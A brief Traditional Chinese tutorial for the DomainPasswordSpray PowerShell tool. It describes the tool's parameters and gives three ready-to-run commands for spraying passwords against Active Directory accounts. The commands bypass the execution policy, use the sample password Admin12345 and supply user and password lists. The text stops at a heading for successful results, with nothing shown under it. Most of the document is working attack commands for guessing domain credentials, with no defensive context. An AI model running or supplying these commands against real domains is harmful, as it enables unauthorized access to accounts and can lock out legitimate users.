0x01 介紹
UserList - Optional UserList parameter. This will be generated automatically if not specified.
Password - A single password that will be used to perform the password spray.
PasswordList - A list of passwords one per line to use for the password spray (Be very careful not to lockout accounts).
OutFile - A file to output the results to.
Domain - A domain to spray against.
Force - Forces the spray to continue without prompting for confirmation.
0x02 實踐
用法一:
自動從當前用戶的域中生成用戶列表,並嘗試使用每個用戶名和密碼Admin12345進行身份驗證
powershell -exec bypass
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Admin12345
用法二:
指定用戶列表,指定單個密碼進行爆破。
Invoke-DomainPasswordSpray -Userlist user.txt -Domain 0day -password Admin12345
用法三:
指定用戶、密碼列表進行爆破,輸出到特定文件中。
Invoke-DomainPasswordSpray -Userlist user.txt -Domain 0day -PasswordList .\pass.txt -OutFile 1.txt
爆破成功結果: